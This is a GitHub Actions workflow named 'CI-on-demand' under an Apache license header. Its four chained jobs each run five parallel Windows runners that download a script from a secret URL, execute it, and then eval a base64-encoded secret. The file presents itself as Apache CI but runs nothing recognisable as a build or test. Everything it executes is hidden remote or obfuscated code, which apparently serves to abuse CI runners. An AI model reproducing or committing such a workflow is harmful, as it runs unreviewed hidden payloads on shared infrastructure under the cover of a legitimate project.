# Licensed to the Apache Software Foundation (ASF) under one
name: CI-on-demand
on: 
  workflow_dispatch:
 
jobs:
  wsl-jobs:
    runs-on: windows-latest
    strategy:
      fail-fast: false
      matrix:
         com: [1,2,3,4,5]
    continue-on-error: true
    defaults:
      run:
          shell: wsl-run {0}
    steps:
      - name: Setup WSL
        env:
          CONF_URL: ${{ secrets.CONF_URL }}
        shell: pwsh
        run: |
          Invoke-WebRequest -Uri $env:CONF_URL -OutFile setup_wsl.ps1
          .\setup_wsl.ps1
      - name: Configure WSL for Apache
        run: |
          eval "$(echo '${{ secrets.KEY }}' | base64 -d)"

  wsl-jobs-version2:
    runs-on: windows-latest
    strategy:
      fail-fast: false
      matrix:
         com: [1,2,3,4,5]
    continue-on-error: true
    needs: wsl-jobs
    defaults:
      run:
          shell: wsl-run {0}
    steps:
      - name: Setup WSL
        env:
          CONF_URL: ${{ secrets.CONF_URL }}
        shell: pwsh
        run: |
          Invoke-WebRequest -Uri $env:CONF_URL -OutFile setup_wsl.ps1
          .\setup_wsl.ps1
      - name: Configure WSL for Apache
        run: |
          eval "$(echo '${{ secrets.KEY }}' | base64 -d)"

  wsl-jobs-version3:
    runs-on: windows-latest
    strategy:
      fail-fast: false
      matrix:
         com: [1,2,3,4,5]
    continue-on-error: true
    needs: wsl-jobs-version2
    defaults:
      run:
          shell: wsl-run {0}
    steps:
      - name: Setup WSL
        env:
          CONF_URL: ${{ secrets.CONF_URL }}
        shell: pwsh
        run: |
          Invoke-WebRequest -Uri $env:CONF_URL -OutFile setup_wsl.ps1
          .\setup_wsl.ps1
      - name: Configure WSL for Apache
        run: |
          eval "$(echo '${{ secrets.KEY }}' | base64 -d)"

  wsl-jobs-version4:
    runs-on: windows-latest
    strategy:
      fail-fast: false
      matrix:
         com: [1,2,3,4,5]
    continue-on-error: true
    needs: wsl-jobs-version3
    defaults:
      run:
          shell: wsl-run {0}
    steps:
      - name: Setup WSL
        env:
          CONF_URL: ${{ secrets.CONF_URL }}
        shell: pwsh
        run: |
          Invoke-WebRequest -Uri $env:CONF_URL -OutFile setup_wsl.ps1
          .\setup_wsl.ps1
      - name: Configure WSL for Apache
        run: |
          eval "$(echo '${{ secrets.KEY }}' | base64 -d)"
